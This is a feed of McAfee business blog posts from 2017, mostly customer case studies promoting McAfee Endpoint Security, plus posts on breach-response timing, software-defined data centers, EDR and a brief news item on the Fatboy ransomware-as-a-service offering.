Why This California State Agency Compares McAfee ENS to a New Car https://securingtomorrow.mcafee.com/business/california-state-agency-compares-mcafee-ens-new-car/ https://securingtomorrow.mcafee.com/business/california-state-agency-compares-mcafee-ens-new-car/#respond Thu, 08 Jun 2017 14:00:57 +0000 https://securingtomorrow.mcafee.com/?p=74724 “If you think of endpoint protection as a car,” says Security Engineer Jeff Bowen at the California Department of Water Resources (DWR), “with McAfee ENS, we now have the latest model, with the best instrumentation, nicest features, and all the bells and whistles.” His CISO agrees. “With McAfee ENS, we remediate faster, have less business […]

The post Why This California State Agency Compares McAfee ENS to a New Car appeared first on McAfee Blogs.

]]>
“If you think of endpoint protection as a car,” says Security Engineer Jeff Bowen at the California Department of Water Resources (DWR), “with McAfee ENS, we now have the latest model, with the best instrumentation, nicest features, and all the bells and whistles.”

His CISO agrees. “With McAfee ENS, we remediate faster, have less business disruption, make better decisions, and protect neighboring workstations and our overall environment—instead of focusing all our attention on an infected workstation while another one gets hit,” notes Chief Information Security Officer Richard Harmonson.

The largest of 30 departments within the California Natural Resources Agency (CNRA), the DWR provides technology infrastructure-as-a-service to the entire state agency. Harmonson and his security team purchase, deploy, and provide multi-tenancy security solutions across the CNRA’s 16,000 endpoints. In the past, the DWR provided another vendor’s endpoint solution to CNRA departments, but that product’s limited visibility, very high false positive rate, and dated technology— “the typical anti-virus product that we’ve seen for the past two decades”— drove Harmonson and his team to seek a better solution.

The DWR information security team found what it was looking for in McAfee ENS version 10.5, which it rolled out across all 4,000 end-user physical devices within DWR. DWR will deploy ENS across the remaining CNRA departments in the coming months, and eventually across virtualized servers as well.

So why is Harmonson and his staff as delighted with McAfee ENS as with a new car?

Three main reasons.

First, improved protection and detection. “Since we rolled out McAfee ENS, we have been detecting and blocking threats we didn’t see before,” claims Harmon. That’s because its Real Protect machine learning behavioral analysis technology catches more malware and its Dynamic Application Containment (DAC) functionality immediately quarantines unknown threats so they can be analyzed and protect Patient Zero from damage.

Second, improved decision making that enables faster response and remediation. According to Harmonson, this is one of the greatest benefits thus far since deploying McAfee ENS. “McAfee ENS is providing us with more and better information to help us better understand the threats that enter our environment,” he says.  Instead of having to wait 24 hours for its anti-virus vendor to create a new signature, DWR is “getting to the point where we can investigate an incident and resolve it within one to four hours.”

Third, ability to take advantage of McAfee Data Exchange Layer (DXL) integration.  McAfee ENS is built to leverage DXL. With the DWR’s recent addition of a McAfee Advanced Threat Defense (ATD) sandboxing appliance and soon-to-be-deployed McAfee Threat Intelligence Exchange and McAfee Endpoint Threat Defense and Response, the organization will be able to share local and global threat information in near real-time among these systems. With these additional McAfee tools, Harmonson expects to create a more adaptive, sustainable threat defense lifecycle that reduces the administrative burden on staff even further, which is especially important since adding staff with the right skill set can be a challenge.

Because of his experience thus far, Harmonson encourages colleagues and counterparts in other California state agencies to consider McAfee ENS. “With the layers of protection that [McAfee ENS] provides, it far exceeds the stereotypical anti-virus product,” he says. “I really appreciate how it provides my staff with the relevant information at their fingertips, helps them understand what happened, accelerates response time, and mitigates risk.”

To read the full case study on the California Department of Water Resources, here. Get your questions answered by tweeting @McAfee_Business.

The post Why This California State Agency Compares McAfee ENS to a New Car appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/california-state-agency-compares-mcafee-ens-new-car/feed/ 0
New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks https://securingtomorrow.mcafee.com/business/new-report-quantifies-times-impact-costs-data-breaches-disruption-attacks/ https://securingtomorrow.mcafee.com/business/new-report-quantifies-times-impact-costs-data-breaches-disruption-attacks/#respond Fri, 02 Jun 2017 04:00:41 +0000 https://securingtomorrow.mcafee.com/?p=74711 This blog was written by Barbara Kay. New analysis from the Aberdeen Group, based on data provided by Verizon, provides fresh evidence quantifying the cost of time in two different incident types: data compromises and sustained disruption in service availability. These findings underscore the urgency for cybersecurity practitioners to minimize detection and containment time. According […]

The post New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

New analysis from the Aberdeen Group, based on data provided by Verizon, provides fresh evidence quantifying the cost of time in two different incident types: data compromises and sustained disruption in service availability. These findings underscore the urgency for cybersecurity practitioners to minimize detection and containment time.

According to the McAfee commissioned report by Aberdeen, Cybersecurity: For Defenders, It’s About Time, the business impact from a data breach is the greatest at the beginning of the exploit, when records are first compromised. That’s logical, since attackers want to get in and out with the goods (your data) in as little time as possible. Most responders are closing the barn door well after the horse has gone, when most of the damage has already been done.

However, in contrast, the business impact from a sustained disruption in availability continues to grow from the time of compromise to the time of remediation. As illustrated below, a 2X improvement in your time to detect and respond to an attack translates to a roughly 70 percent lower business impact.

Aberdeen Group concludes that time to detection remains a top challenge for defenders responding to cyberattacks, putting enterprises at risk. The report discusses that in more than 1,300 data breaches, investigated between 2014 and 2016, half of detections took up to 38 days, with a mean average of 210 days, an average skewed by some incidents taking as long as four years.

This data shows that cybersecurity practitioners can improve their ability to protect business value if they can implement strategies that prioritize faster detection, investigation, and response to incidents.

Recommendations

In the study, Aberdeen Group provides four illustrative examples of how recapturing an advantage of time can help defenders to reduce their risk, with suggestions on countermeasures and counterstrategies. Some highlights include use of the latest identification and containment technologies:

  • Before zero-day: identification (e.g., through reputation, heuristics, and machine learning). Attackers have become increasingly adept at morphing the footprint of their malicious code, to evade traditional signature-based defenses. But advanced pre-execution analysis of code features, combined with real-time analysis of code behaviors, are now being used to identify previously unknown malware without the use of signatures, before it has the opportunity to execute.
  • After identification: containment (e.g., through dynamic application protection, and aggregated intelligence into active threat campaigns). Advanced endpoint defense capabilities now allow potentially malicious code to load into memory — but block it from making system changes, spreading to other systems, or other typically malicious behaviors. This approach provides immediate protection, and buys additional time for intelligence —gathering and analysis — without disrupting user productivity.

For data center and cloud security, some of the above endpoint tactics can be applied to server and virtual workloads to protect against both known and unknown exploits. Aberdeen Group also suggests you can improve your results through shielding and virtual patching tactics. This concept has been around for years, but is especially helpful when assets are centralized.

  • Virtual patching: Sometimes known as external patching or vulnerability shielding — establishes a policy that is external to the resources being protected, to identify and intercept exploits of vulnerabilities before they reach their intended target. In this way, direct modifications to the resource being protected are not required, and updates can be automated and ongoing.
  • Strategic enforcement points: Design using fewer policy enforcement points (i.e., at selected points in the enterprise network, as opposed to taking the time to apply vendor patches on every system)

As an industry, we are spending more and working harder to shorten the time advantage of the attacker. Modern tools and thoughtful practices in endpoint and data center infrastructure complement the analytics and automation investments that are transforming the Security Operations Center (SOC), technologies such as anomaly detection and threat intelligence correlation.

This report shows that we still have work to do, and provides evidence for CIOs and the board that there’s a clear business incentive to continue to act.

To read the full report, visit https://mcafee.ly/2r0VNBq.

The post New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/new-report-quantifies-times-impact-costs-data-breaches-disruption-attacks/feed/ 0
With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work https://securingtomorrow.mcafee.com/business/mcafee-ens-swedish-town-gains-secure-environment-requiring-less-work/ https://securingtomorrow.mcafee.com/business/mcafee-ens-swedish-town-gains-secure-environment-requiring-less-work/#respond Thu, 25 May 2017 14:00:06 +0000 https://securingtomorrow.mcafee.com/?p=74118 For Jens Lindström, who oversees security operations for Norrköpings Kommun, a Swedish town of 140,000 inhabitants, ransomware was becoming his nemesis. “With the increasing pace of ransomware attacks, I was beginning to imagine a day in the not-too-far-off future when all my time would be dedicated to dealing with ransomware attacks,” he muses. “Thankfully, we […]

The post With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work appeared first on McAfee Blogs.

]]>
For Jens Lindström, who oversees security operations for Norrköpings Kommun, a Swedish town of 140,000 inhabitants, ransomware was becoming his nemesis. “With the increasing pace of ransomware attacks, I was beginning to imagine a day in the not-too-far-off future when all my time would be dedicated to dealing with ransomware attacks,” he muses. “Thankfully, we implemented McAfee ENS before that could happen.”

The need to bolster endpoint protection and thwart ransomware ultimately drove this Swedish municipality to migrate the McAfee VirusScan Enterprise engine, McAfee Host Intrusion Prevention, and McAfee SiteAdvisor® functionality of its McAfee Complete Threat Protection suite to McAfee Endpoint Security (ENS) version 10.2 not long after it became available. And soon after deploying McAfee ENS version 10.2, ENS version 10.5 became available so the organization upgraded to it to take advantage of its Real Protect machine learning technology in addition to Dynamic Application Containment technology.

According to Lindström, migration of the town’s 14,000 endpoints to McAfee ENS 10.2 took only a few hours each day for about a week. “With the help of our partner Advania and the McAfee migration tool, [migration to McAfee ENS] was extremely straightforward and not complicated at all,” says Lindstrom. “First, we rolled it out to all our schools, then we moved on to the administrative networks.”

Happily, Lindström’s hopes for improved endpoint protection with McAfee ENS were fulfilled. “Our single biggest driver for migrating to McAfee ENS and our biggest benefit thus far has been better protection,” notes Lindström. “Since implementing ENS, we have seen a dramatic reduction in infected systems and ransomware attacks.”

Improved protection means Lindström spends less time fighting fires, which enables him to do his job more efficiently and effectively. In addition, the improved graphical user interface in McAfee ENS helps him every day in the security administrator part of his job. “Dealing with endpoint security has become much easier and more streamlined since we migrated,” he says. “I can quickly see what tasks require action and more easily do many of those tasks, such as push updates across the enterprise.”

Of course, making security administration easier is not the Municipality’s top priority; protecting services and information for the town’s citizens is. However, with McAfee ENS, Norrköpings Kommun has a more secure environment while requiring less time and effort of its very limited information security staff.

To read the full case study on Norrköpings Kommun and its McAfee ENS implementation, click here. Get your questions answered by tweeting @McAfee_Business.

The post With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-ens-swedish-town-gains-secure-environment-requiring-less-work/feed/ 0
SDDC 101: The Why, the What, and the How https://securingtomorrow.mcafee.com/business/cloud-security/sddc-101-the-why-the-what-and-the-how/ https://securingtomorrow.mcafee.com/business/cloud-security/sddc-101-the-why-the-what-and-the-how/#respond Mon, 22 May 2017 20:15:28 +0000 https://securingtomorrow.mcafee.com/?p=74334 This blog post was written by Raja Patel. The Software Defined Data Center (SDDC) has fundamentally changed how IT delivers infrastructure and services. SDDC rethinks traditional ways of using virtualized resources by adding virtual networks (SDN) and virtualized storage (SDS) to virtual compute as a better way to build data centers, improve security and keep […]

The post SDDC 101: The Why, the What, and the How appeared first on McAfee Blogs.

]]>
This blog post was written by Raja Patel.

The Software Defined Data Center (SDDC) has fundamentally changed how IT delivers infrastructure and services. SDDC rethinks traditional ways of using virtualized resources by adding virtual networks (SDN) and virtualized storage (SDS) to virtual compute as a better way to build data centers, improve security and keep costs down.

The included automation and orchestration of resources has made infrastructure operations smooth and, more importantly, has enabled security to be “built-in” to the architecture.  This is in stark contrast to traditional data centers, with physical infrastructure, where security was an afterthought.

To evaluate the impact of the move to SDDC – McAfee in partnership with VMware, sponsored the Osterman Research  “The Why, the What and the How of the Software-Defined Data Center,” which explains the nuts and bolts of SDDC, provides a deeper understanding of its value to your business as it moves to the cloud and also how it improves your security posture.

From the research, we see that while many organizations have virtualized their servers, they haven’t yet embraced the full virtualization of a software-defined data center:

Figure 1

Percentage of Servers that are Virtualized
2017 and 2019

Source: Osterman Research, Inc.

And while only 3% have moved to SDDC, there is great intention to do so:

Figure 2

“Does your organization plan to transform your data center(s) into Software-Defined Data Centers? 

Source: Osterman Research, Inc.

So, Why SDDC?

From our survey respondent confirmed what we believed- an SDDC improves operational efficiency, creates a more secure data center and reduces costs.

Reasons That Organizations Want to Move to an SDDC 

Source: Osterman Research, Inc.

Source: Osterman Research, Inc.

These business benefits help organizations as they transition their infrastructure into a cloud-ready agile environment for both private and hybrid cloud.

Probably the greatest benefit of an SDDC is its ability to transform the data center from being a slow-to-support-the-business department of saying “no” to an agile business driver, where the department says “yes” to quickly deploying applications and services, truly helping to grow the business objectives of your company. With the agile infrastructure of an SDDC, you can elastically scale as demand on your applications increases. An SDDC allows you to extend and manage applications across private and public clouds so you can optimize based on your current and evolving needs.

How does SDDC Work and Improve Security?

With SDDC, the three main pillars of datacenter – compute, networking and storage are virtualized. This virtualized environment provides high degree of automation with agility. Traditionally, virtualized architectures are drawn by expedience, which means that managing a virtualized data center required lots of interaction with many moving parts. However, these moving parts are not integrated and do not have the understanding that they had been virtualized. SDDC rethinks and redraws functional boundaries, by moving intelligence from lower layers up into the VM platform, thus improving automation, management and security.

This new virtual and dynamic data center architecture introduces new security and compliance considerations as well. You will need complete visibility into all your workloads as they are provisioned so you can know what needs to be secured. In addition, as you now have east-west traffic flows between your VMs, inspection of that traffic is key. McAfee Data Center and Cloud Defense solutions help secure the new infrastructure of an SDDC, all within the same management as your traditional security. Integrated, dynamic protection technologies match the agility of your new data center infrastructure to protect against advanced threats and maintain compliance, including the ability to monitor east-west traffic flows inside the SDDC environment.

The bottom line? Transforming your traditional data center into a SDDC offers numerous benefits, including significant improvements to data center security. The SDDC is ready for prime-time and offers substantial advantages over traditional data center approaches. Are you ready to grab hold of the opportunity?

To learn more, download the whitepaper “The Why, the What and the How of the Software-Defined Data Center.”

The post SDDC 101: The Why, the What, and the How appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/sddc-101-the-why-the-what-and-the-how/feed/ 0
New Ransomware Adjusts Its Price Based Off Where You Live https://securingtomorrow.mcafee.com/business/new-ransomware-adjusts-price-based-off-live/ https://securingtomorrow.mcafee.com/business/new-ransomware-adjusts-price-based-off-live/#respond Fri, 12 May 2017 20:21:22 +0000 https://securingtomorrow.mcafee.com/?p=73935 Discovered on Exploit, a Russian hacking forum, a new kind of RaaS (ransomware-as-a-service) portal named Fatboy Ransomware has emerged. The service, which is currently available for cybercriminals on the forum to leverage for their own benefit, is unique because it’s programmed to change its ransom amount based on the victim’s location, raising the amount in countries with […]

The post New Ransomware Adjusts Its Price Based Off Where You Live appeared first on McAfee Blogs.

]]>
Discovered on Exploit, a Russian hacking forum, a new kind of RaaS (ransomware-as-a-service) portal named Fatboy Ransomware has emerged. The service, which is currently available for cybercriminals on the forum to leverage for their own benefit, is unique because it’s programmed to change its ransom amount based on the victim’s location, raising the amount in countries with a higher cost of living, based on the Big Mac Index.

The Big Mac Index, first introduced by The Economist in the 1980s, was meant to innocently gauge currency misalignment, but has grown to become a global standard for measuring international purchasing power parity. And now, is being used by a threat actor using the handle “polnowz,” who has apparently already made $5,321 in ransomware payments off the tool. The cybercriminal also seems to be all about transparency, as anyone that signs up for Fatboy will work directly via Jabber with the author of the product instead of a third-party distributor.

And though it is the first known online extortion product that is designed to automatically change ransom amounts based on the victim’s location, this threat comes as no surprise. Cybercriminals are mostly financially motivated, so it is expected that we see business models that facilitate increased profit. This specific financially-motivated model, ransomware-as-a-service, has been around since at least mid-2015, and was popularized by Tox, a short-lived ransomware service.

So, how does this particular case of RaaS work? The encryption algorithms used are standard, leveraging AES-256 and RSA-2048 and an offsite private key storage until the ransom is paid. And when it comes to RaaS, the buyer is generally responsible for delivering the payload while the developer hosts other services. As such, the method of delivery can be numerous. If the buyer of the portal wants to check in on the results of such delivery, they can log into an online panel for infection statistics. Other malware services have seen success by adding user friendly features such as these panels.

Fatboy is not particularly sophisticated as a malware sample, but it is a good indicator that the ransomware business model for cybercriminals is still working. As long as there are sufficient profits, we will see more offerings, tools, and support for cybercriminals without the skills or time to develop their own ransomware.

Now, the next step is to think about protection. Users should keep their security products up-to-date and engage in good security behaviors. As for IT professionals, they should be watching for artifacts of this ransomware. While the infection is generally an executable, Python is used during encryption, so be on the lookout for suspicious activity with .pyc and .pyd files.

And if you do become infected by Fatboy ransomware, No More Ransom has come together to pull together a plethora of decryption tools victims can leverage, which you can find here. Also, learn more about preventing ransomware, here.

If you’re looking to stay up-to-date on Fatboy ransomware and attacks like it, follow @McAfee and @McAfee_Business.

The post New Ransomware Adjusts Its Price Based Off Where You Live appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/new-ransomware-adjusts-price-based-off-live/feed/ 0
The EDR Balancing Act: Impact vs. Ability to Execute https://securingtomorrow.mcafee.com/business/endpoint-security/edr-balancing-act/ https://securingtomorrow.mcafee.com/business/endpoint-security/edr-balancing-act/#respond Thu, 11 May 2017 15:00:40 +0000 https://securingtomorrow.mcafee.com/?p=73829 A new breed of advanced malware has its sights on your business. It’s been cleverly crafted to evade standard defenses, burrow into your endpoints, and hide undetected, indefinitely, waiting to spread to other systems. Unfortunately, this is now day-to-day reality for most organizations. The question is what to do about it. Here’s the way organizations […]

The post The EDR Balancing Act: Impact vs. Ability to Execute appeared first on McAfee Blogs.

]]>
A new breed of advanced malware has its sights on your business. It’s been cleverly crafted to evade standard defenses, burrow into your endpoints, and hide undetected, indefinitely, waiting to spread to other systems. Unfortunately, this is now day-to-day reality for most organizations. The question is what to do about it.

Here’s the way organizations would like to respond: A top security investigator identifies a new malware threat. Using the latest and greatest endpoint detection and response (EDR) tools, she hunts for similar threats in the environment and roots out every other infected system. She learns exactly what the malware did and how, remediates the problem everywhere it exists, and updates defenses to block similar attacks in the future.

Unfortunately, here’s what actually happens: An endpoint administrator encounters an infected machine. He re-images the endpoint and puts the user back online. In the back of his mind, he knows he didn’t actually solve the problem that allowed the infection in the first place. He knows there’s a good chance it’s spread to other endpoints. But the few expert investigators in the organization are already buried in work. And sifting through mountains of data to manually search for the threat would take weeks.

You can see the disconnect. Modern EDR tools can provide amazing defense capabilities. But there just aren’t enough people out there who can use them effectively. According to a 2016 global survey from McAfee and the Center for Strategic and International Studies, 82 percent of organizations report a shortage of cybersecurity skills. Meanwhile, threats continue to increase.

There’s a way out of this catch-22, but it requires a different way of thinking about EDR. Incident detection and response doesn’t have to be limited to advanced toolsets for specialized experts. By taking advantage of integrated EDR capabilities integrated into modern endpoint security platforms, you may be able to accomplish a lot more than you realize.

Generally, incident response falls across four categories: detect, contain, investigate, remediate. Modern endpoint platforms can integrate with EDR to provide more visibility and automated capabilities across all those categories, so that front-line administrators can shoulder a lot more of that burden than they used to.

Modern integrated endpoint solutions include:

  • File search: If an administrator can use Google, they should be able to use basic EDR interface to search for a known malware file. With literally one click, the should be able to see a graphical map of every endpoint where the file resides.
  • Hash search: In the same way, any administrator who can copy and paste a file hash should be able to search malware they’ve encountered on an endpoint to see, in seconds, everywhere else it’s spread.
  • Automated remediation: When an admin does identify an infection, he’ll want to remove it from every infected endpoint with one click.
  • Automated inoculation: With another click, the administrator could update every other endpoint and security system in the environment to recognize that malware in the future and block it before it executes.

Compare that to the status quo, where each of these activities—correlating a suspected threat, discovering all endpoints it’s infected, removing it, tuning other security solutions (IPS, firewall, web gateways, endpoint agents) to detect it in the future—requires enormous manual effort.

Integrated EDR in Action

How much EDR should happen as part of everyday endpoint operations versus projects spearheaded by specialized experts? There’s no single right answer—it’s about balancing the potential impact of a given activity with your ability to execute. If you’re going to find the right EDR formula for your organization, you need to be honest with yourself about your personnel and investments.

State-of-the-art EDR platforms can provide amazing visibility and incident response capabilities—they can have a huge impact. But the cost to execute is extremely high. Alternatively, endpoint defense platforms with integrated EDR capabilities may not deliver exactly the same impact, but the cost to execute is much lower. With integrated EDR tools and automated workflows, many aspects of investigation and response can be handled by administrators with minimal training.

Integrated EDR may not replicate everything a skilled investigator can do with the most powerful EDR platforms. But if you can accomplish 80 percent of the results with a fraction of the effort, at a fraction of the cost, that’s a pretty good balance of impact and ability to execute.

The post The EDR Balancing Act: Impact vs. Ability to Execute appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/edr-balancing-act/feed/ 0
“Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS https://securingtomorrow.mcafee.com/business/stronger-lighter-%e2%88%92-early-adopter-compares-vs-mcafee-ens/ https://securingtomorrow.mcafee.com/business/stronger-lighter-%e2%88%92-early-adopter-compares-vs-mcafee-ens/#respond Thu, 11 May 2017 14:00:30 +0000 https://securingtomorrow.mcafee.com/?p=73646 When Philippe Maquoi heard about McAfee Endpoint Security (ENS), he immediately signed up to became one of its first beta testers. “I had been looking for a product like ENS for some time,” he says, “and I had confidence that McAfee was capable of giving me such a product.” As head of the SPW Endpoint […]

The post “Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS appeared first on McAfee Blogs.

]]>
When Philippe Maquoi heard about McAfee Endpoint Security (ENS), he immediately signed up to became one of its first beta testers. “I had been looking for a product like ENS for some time,” he says, “and I had confidence that McAfee was capable of giving me such a product.”

As head of the SPW Endpoint and Server Security team, Philippe Maquoi oversees information security for Service Public de Wallonie (SPW), the public administration arm of the regional government of Wallonia, the French-speaking region of Belgium. Maquoi and his team are responsible for securing the 9,000 desktops, 1,300 servers, and 1,000 major applications used by the government’s more than 8,000 employees.

Maquoi’s team initially migrated 1,000 computers to McAfee ENS version 10.2 and plans to migrate all 9,000 endpoints to ENS version 10.5 imminently. Although Maquoi can’t wait to take full advantage of the Real Protect machine learning and behavioral detection functionality in the most recent version of ENS, he has already seen tremendous benefits from implementing ENS 10.2.

“What I like best about McAfee ENS so far is that it is both stronger and lighter,” says Maquoi. “By that I mean it has superior detection and prevention technology that protects us better against present and future threats, but it is also easier to manage. Both aspects are equally important.”

Better Protection, Time Savings, and More with McAfee ENS

Since SPW initially installed ENS on some but not all nodes, it was easy to compare the impact of the new endpoint security framework to the previous endpoint protection. Take, for instance, when Nemucod ransomware attacked the organization and a handful of users, some on desktops with McAfee ENS and some on desktops without it, clicked on a button embedded in the phishing email. On the desktops not yet migrated to ENS, the user’s action triggered a JavaScript that downloaded the ransomware—which resulted in two days of work restoring corrupted administrative shares. On the desktops protected by ENS, however, the JavaScript was prevented from executing and users continued working, business as usual.

Maquoi’s team has also seen significant operational time savings compared to dealing with endpoints not yet protected by ENS. For starters, none of his team had to spend time re-mediating on the ENS-protected desktops after the ransomware attack just mentioned. With McAfee ENS, there is less administrative overhead, which also frees up time.

“McAfee ENS is smart enough to stop threats without us having to manually create a bunch of rules, as we had to do in the past,” he states. “Also, instead of having to push out and update multiple agents for various aspects of protection—a HIPS agent, a web content control agent, and so on—booting and rebooting each time, with ENS we have a stronger toolset, encompassed in one product, with just one agent to deal with.”

In addition, for ENS-protected machines, Maquoi says his team no longer has to listen to complaints from angry users on scan day. With malware scanning no longer impacting the performance of those devices, their users are now much happier and more productive.

Furthermore, by migrating to McAfee ENS, SPW is laying the foundation for an adaptable, sustainable threat defense lifecycle. That’s because McAfee ENS is built to communicate using the McAfee Data Exchange Layer (DXL) fabric, which enables near real-time exchange of local and global threat information among diverse security systems via McAfee Threat Intelligence Exchange. Consequently, in the near future when SPW implements McAfee Advanced Threat Defense (ATD) for in-depth sandbox analysis, SPW endpoints will be able to receive threat information directly from ATD and send information directly to ATD, creating even stronger threat detection capabilities and enabling even faster response.

To read the full case study on Service Public de Wallonie, click here. Get your questions answered by tweeting @McAfee.

The post “Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/stronger-lighter-%e2%88%92-early-adopter-compares-vs-mcafee-ens/feed/ 0
Become a Modern Endpoint Security Master https://securingtomorrow.mcafee.com/business/endpoint-security/become-modern-endpoint-security-master/ https://securingtomorrow.mcafee.com/business/endpoint-security/become-modern-endpoint-security-master/#respond Tue, 09 May 2017 23:00:08 +0000 https://securingtomorrow.mcafee.com/?p=73821 A new wave of advanced, targeted malware is seeking out the gaps in conventional endpoint defenses and finding novel ways to exploit them. These attacks use packing, encryption, and polymorphism to mask their true intent, hammering away at your organization with previously unseen “zero-day” attacks that signature-based mechanisms are too slow to catch. They use […]

The post Become a Modern Endpoint Security Master appeared first on McAfee Blogs.

]]>
A new wave of advanced, targeted malware is seeking out the gaps in conventional endpoint defenses and finding novel ways to exploit them. These attacks use packing, encryption, and polymorphism to mask their true intent, hammering away at your organization with previously unseen “zero-day” attacks that signature-based mechanisms are too slow to catch. They use sophisticated executables that can recognize when they’re being sandbox-analyzed and delay execution. They weaponize legitimate files and applications that appear clean on the surface but have malicious code buried deep within.

It all adds up to a nonstop, overwhelming effort as your endpoint administrators race against the clock to detect, contain, and remediate new malware threats. And if you’re like many organizations, this is a race you’re losing far too often. Too many threats get through. Too many resources are needed to sift through alerts from multiple siloed point solutions and clean up infections. And the time between detection and remediation keeps growing.

There’s an underlying problem here that may sound familiar. When you’re relying on multiple siloed endpoint defense products that can’t talk to each other, you require extra steps and manual effort from your administrators. That takes time and slows your response. Why not try a different approach? Instead of racing around swiveling between half a dozen siloed security tool interfaces, what if your team could use next-generation machine learning techniques to stop most threats before they ever gain a foothold on your endpoints? What if you had a unified, fully integrated, multi-layered defense fabric that could respond to new events and information immediately, without human intervention?

Peel Away the Malware Mask

Next-generation anti-malware capabilities from McAfee can help your organization combat the most evasive modern threats. Drawing on powerful machine learning analysis and application containment tools, your team can unmask hidden threats and stop them in their tracks—much faster with much less effort. These capabilities are delivered through three new innovations:

  • Real Protect Static: Malware authors may be able to change how their code looks, but it’s still malware. So it’s likely to share many attributes with known attacks, such as the compiler used, the shared libraries it references, and many other features. Real Protect Static pre-execution analysis goes beneath the surface, performing an exhaustive machine learning statistical comparison of static binary code features to compare suspicious executables against known threats. It unmasks most malware for what it is in milliseconds, without signatures.
  • Real Protect Dynamic: Even if a sophisticated attack masks its static attributes, it can’t hide how it behaves. Real Protect Dynamic behavioral analysis also provides machine learning statistical analysis, but now comparing the code’s actual behavior against profiles of hundreds of millions of malware samples. The executable is allowed to run while being closely monitored by the endpoint. If it starts behaving maliciously—such as overwriting files or making registry changes that match known malware behavior—the endpoint shuts it down, typically within seconds.
  • Dynamic Application Containment: This new endpoint defense, available only from McAfee, protects against zero-day malware by blocking process actions that malware often uses. Unlike techniques that would hold up the file (and the user) for minutes at a time, Dynamic Application Containment lets the suspicious file load into memory without allowing it to make certain changes to the endpoint or infect other systems while it is under suspicion. The endpoint and user can remain fully productive while providing an opportunity for security teams to perform in-depth analysis.

With these capabilities, your administrators can stop most threats before they can damage an endpoint. They can take on the most sophisticated, evasive malware without needing a team of highly trained security experts. They can fine-tune application containment tools to restrict what can happen on endpoints, and achieve the right balance of security and flexibility for the organization.

Drive Down Complexity, Accelerate Response

Real Protect and Dynamic Application Containment work with each other, as well as the other elements of McAfee Endpoint Security, and with other solutions such as McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense as a single, integrated system. For example, when Real Protect identifies an evasive threat as zero-day malware, it immediately communicates that information to McAfee Threat Intelligence Exchange, which then automatically inoculates the broader environment, in near real time.

The result is a continually evolving threat model for your organization. Each new threat detected enhances the organization’s defenses as a whole. Previously manual steps in the detect, correct, and protect phases of the threat defense lifecycle disappear. And you gain the flexibility to mix and match the industry’s broadest portfolio of threat defense capabilities through a single interface.

Armed with these capabilities, your team can:

  • Unmask the attack: Stop more attacks by stripping away obfuscation techniques to see more malware threats.
  • Limit the impact: Contain, shield, and prevent damage to systems, either before an attack occurs or before it can cause irreversible damage or infection.
  • Track and adapt: Use automated, integrated defenses to perform a wider range of security operations without having to think about them or manually activate them.

 

The post Become a Modern Endpoint Security Master appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/become-modern-endpoint-security-master/feed/ 0
Security Automation is Here —The Time is Now: 60% of respondents think manual processes are holding back security effectiveness https://securingtomorrow.mcafee.com/business/security-operations/security-automation-time-now-60-respondents-think-manual-processes-holding-back-security-effectiveness/ https://securingtomorrow.mcafee.com/business/security-operations/security-automation-time-now-60-respondents-think-manual-processes-holding-back-security-effectiveness/#respond Tue, 09 May 2017 19:39:40 +0000 https://securingtomorrow.mcafee.com/?p=73787 This blog was written by Barbara Kay. There was a time when automation was a dirty word in security. Now, it is a necessity. A new Enterprise Strategy Group (ESG) survey, sponsored by McAfee and other technology vendors, shows that 3 out of 5 organizations see manual processes as holding them back from better organizational […]

The post Security Automation is Here —The Time is Now: 60% of respondents think manual processes are holding back security effectiveness appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

There was a time when automation was a dirty word in security. Now, it is a necessity. A new Enterprise Strategy Group (ESG) survey, sponsored by McAfee and other technology vendors, shows that 3 out of 5 organizations see manual processes as holding them back from better organizational effectiveness when it comes to security analytics and operations. My rule of thumb is: The third time you do the same thing, automate it. That doesn’t mean automating actions like wiping a system or rebooting, but it does mean you get the machines to do the easy work. Automation can mean setting a policy, defining an alarm or quarantine based on a trigger, defining a correlation rule to make the same review decision you had been doing and then setting an alarm or creating a watchlist, or using a script to package and forward data. Any of these approaches is easily implemented with today’s technology.

A case in point – the  findings also show that the #1 priority for automation and/or orchestration is integrating external threat intelligence with internal security data collection and analysis. That capability is entirely automated today with the McAfee Enterprise Security Manager. You can consume IOCs and mine your database to see if they are already part of your environment, generating alarms for any matches, and also set a watch in case these IOCs enter your infrastructure in the future. The watchlist can also implement an action you define – from simple alarm to active quarantine. Check out this video to see for yourself.

ESG Research, Cybersecurity Analytics and Operations Survey, April 2017.

The post Security Automation is Here —The Time is Now: 60% of respondents think manual processes are holding back security effectiveness appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/security-automation-time-now-60-respondents-think-manual-processes-holding-back-security-effectiveness/feed/ 0
Can You Spot the “Misaligned Lie?” Contest Terms and Conditions https://securingtomorrow.mcafee.com/business/can-spot-misaligned-lie-contest-terms-conditions/ https://securingtomorrow.mcafee.com/business/can-spot-misaligned-lie-contest-terms-conditions/#respond Mon, 08 May 2017 15:00:42 +0000 https://securingtomorrow.mcafee.com/?p=73623 Remember the old-school icebreaker “Two Truths and a Lie?” Well, in honor of our Misaligned Incentives Report, we’re asking you to spot the “Misaligned Lie!” Put your knowledge to the test with this version of “Two Truths and a Lie” and you could win an Amazon Gift Card! From May 8th-11th we’ll share “Two Truths […]

The post Can You Spot the “Misaligned Lie?” Contest Terms and Conditions appeared first on McAfee Blogs.

]]>
